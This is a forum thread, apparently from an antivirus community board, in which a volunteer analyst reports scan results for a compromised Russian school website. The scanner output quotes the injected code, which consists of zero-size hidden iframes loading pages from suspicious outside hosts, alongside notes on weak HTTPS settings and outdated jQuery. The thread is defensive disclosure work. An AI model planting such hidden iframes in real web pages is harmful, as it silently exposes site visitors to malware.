Author Topic: Instances of suspicious script flagged? (Read 1403 times)

polonus · « **on:** October 13, 2018, 08:32:42 PM »

See: https://urlquery.net/report/3cb59419-4b5a-42e7-b7e7-94978099b84a
Re line 206 etc.: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LjE1MC1tXW5bbl0yLnsjdXNbdHsufXU%3D~enc
Security hint: -http://www.150-monino2.edusite.ru/_ext/comment.php?pid=47&title=��¬ify=yes
-> https://webhint.io/scanner/8a990e08-715f-4f88-a032-9106424a7aab
'strict-transport-security' header 'max-age' value should be more than 10886400

Consider for -http://www.150-monino2.edusite.ru

Scanner output:
Scanning -http://www.150-monino2.edusite.ru ...
Script loaded: -http://www.150-monino2.edusite.ru/menus.js
Script loaded: -http://rusobr.ru/count.php?sid=4719
{"date":"2018-10-13T18:24:37.810Z","timeout":"-http://188.165.163.235/index/api.php?sid=9Hbrbj_20O5TRHrR0aFL"}
{"date":"2018-10-13T18:24:37.811Z","timeout":"-http://211.227.18.92/page1.php"}
{"date":"2018-10-13T18:24:37.812Z","timeout":"-http://combach.com/gl1_2.php"}

No content returned for https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=fXVzXWJ9Ln11YF5ddW50LnBocDxzWyM9NDcxOQ%3D%3D~enc

3 hints -> https://webhint.io/scanner/65d30a79-a7b5-4b20-8abd-f8124e282006

C-grade scan results 3: https://www.htbridge.com/ssl/?id=twjOeUxs consider third party content in scan flagged.

polonus (volunteer 3rd party cold reconnaissance website security analyst & website error-hunter)

polonus · « **Reply #1 on:** October 13, 2018, 11:32:14 PM »

Error for the original scansite: error

Quote

-www.150-monino2.edusite.ru/
status: (referer=-http:/XXX/web?q=puppies)saved 29164 bytes 54bdc21874d239391ae95fca66dc2b7e18ede260
info: [script] -www.150-monino2.edusite.ru/menus.js
info: [iframe] -188.165.163.235/index/api.php?sid=9H20O5TRHrR0aFL
info: [img] -www.150-monino2.edusite.ru/images/gerbshkolyi.png
info: [img] -www.150-monino2.edusite.ru/images/p47_izobrajenie.jpg
info: [img] -www.150-monino2.edusite.ru/scin/logo.jpg
info: [img] -www.150-monino2.edusite.ru/scin/sp.gif
info: [script] -rusobr.ru/count.php?sid=4719
info: [img] -rusobr.ru/banners/j120x60_01.jpg
info: [img] -rating.rosnou.ru/images/baner160-60.gif
info: [img] -www.150-monino2.edusite.ru/images/p81_bar7.gif
info: [iframe] -www.150-monino2.edusite.ru/_ext/comment.php?47
info: [img] -www.150-monino2.edusite.ru/_ext/pic.php
info: [decodingLevel=0] found JavaScript
error: undefined variable parseStylesheets
error: undefined function parseStylesheets
info: DecodedIframe detected
info: [var g1] URL=-www.150-monino2.edusite.ru/
info: [var newurl] URL=-www.150-monino2.edusite.ru/
info: [iframe] -211.227.18.92/page1.php
info: [iframe] -combach.com/gl1_2.php
info: [iframe] -211.216.76.177/tag1.php
info: [decodingLevel=1] found JavaScript
error: line:15: SyntaxError: missing ; before statement:
error: line:15: <iframe width="0" height="0" board="0" src="-http:/211.216.76.177/tag1.php"></iframe><iframe width="0" height="0" board="0" src="-http:/211.227.18.92/page1.php"></iframe><iframe width="0" height="0" board="0" src="-http:/combach.com/gl1_2.php"></iframe>
error: line:15: ......................................................................................^
file: 54bdc21874d239391ae95fca66dc2b7e18ede260: 29164 bytes
file: 4075a225408928cf3042cd815bb2abce54fc2444: 938 bytes

For the C-grade detections mentioned in the scan results above, 2 vulnerable jQuery libraries were detected: https://retire.insecurity.today/#!/scan/6100a47a9e6b10fed97d3fe3c5351397cc1d0a2e3026c445306a86dfbed95849

Look for results here: https://www.htbridge.com/ssl/?id=MfD8LzCK
"The HTTP version of the website does not redirect to the HTTPS version. We advise to enable redirection".
Script error

Quote

[embed] -xenia.edusite.ru/js/fancybox/
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined function $
file: 1cf3d47b5ccb7cb6e9019c64f2a88d03a64853e4: 48706 bytes
&
info: [script] -xenia.edusite.ru/scin/my.js
info: [decodingLevel=0] found JavaScript
error: undefined variable $
error: undefined function $
file: d989417ee36e7f01ad680a230f974d69253df8a5: 10733 bytes
&
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
info: [iframe] -xenia.edusite.ru/js/highslide/
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete)

To land at an improved website security infrastructure the use of 'best policies' is advised.
Everybody may prosper, website admin(s), hoster, and end-users alike.

That is why I do this. Iif only those responsible would take found hints and would follow recommendations proposed,
we would arrive at a much more secure world, where mutual trust could again be spelled with a big T.

yours truly,

Damian aka polonus (volunteer website security analyst and website error-hunter)

polonus · « **Reply #2 on:** October 14, 2018, 12:28:00 AM »

Also consider 9 red out of 10 netcraft risk rating: https://toolbar.netcraft.com/site_report?url=http://211.227.18.92
and detections here: https://www.virustotal.com/#/ip-address/211.227.18.92

Conclusion avast will detect "HTML:Iframe-inf" here, and we are being protected,

polonus